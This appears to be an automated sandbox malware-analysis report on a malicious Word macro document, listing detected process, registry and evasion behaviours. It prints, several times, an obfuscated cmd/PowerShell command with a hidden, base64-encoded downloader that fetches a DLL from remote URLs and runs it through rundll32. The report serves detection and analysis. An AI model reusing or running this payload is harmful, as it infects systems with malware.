Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: N00048481397007.doc Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi Name: Gp0t5ucwnkng7fi
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043100B push ss; iretd 7_2_0043100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018F090 push edx; ret 7_2_0018F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017057F push ss; iretd 7_2_00170580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00482D98 push 00482E25h; ret 7_2_00482E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490020 push 00490058h; ret 7_2_00490050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00484038 push 00484064h; ret 7_2_0048405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045A0B4 push 0045A0E0h; ret 7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045A0B2 push 0045A0E0h; ret 7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B274 push 0045B2CDh; ret 7_2_0045B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046C34C push 0046C378h; ret 7_2_0046C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E450 push ecx; mov dword ptr [esp], edx 7_2_0045E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004904F4 push 0049055Ch; ret 7_2_00490554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490498 push 004904EFh; ret 7_2_004904E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004905F0 push 0049063Ch; ret 7_2_00490634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0048B588 push 0048B5CAh; ret 7_2_0048B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490580 push 004905ACh; ret 7_2_004905A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004905B8 push 004905E4h; ret 7_2_004905DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490654 push 00490680h; ret 7_2_00490678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004906C4 push 004906F0h; ret 7_2_004906E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045D6DC push 0045D751h; ret 7_2_0045D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E6F0 push ecx; mov dword ptr [esp], edx 7_2_0045E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0049068C push 004906B8h; ret 7_2_004906B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E696 push ecx; mov dword ptr [esp], edx 7_2_0045E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00458748 push 00458774h; ret 7_2_0045876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045D754 push 0045D7ADh; ret 7_2_0045D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E750 push ecx; mov dword ptr [esp], edx 7_2_0045E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004907E4 push 00490827h; ret 7_2_0049081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00458798 push 004587C4h; ret 7_2_004587BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004937A8 push 004937E0h; ret 7_2_004937D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00493848 push 00493874h; ret 7_2_0049386C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0049086C push 00490898h; ret 7_2_00490890

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Txroij\ohrhi.kon:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
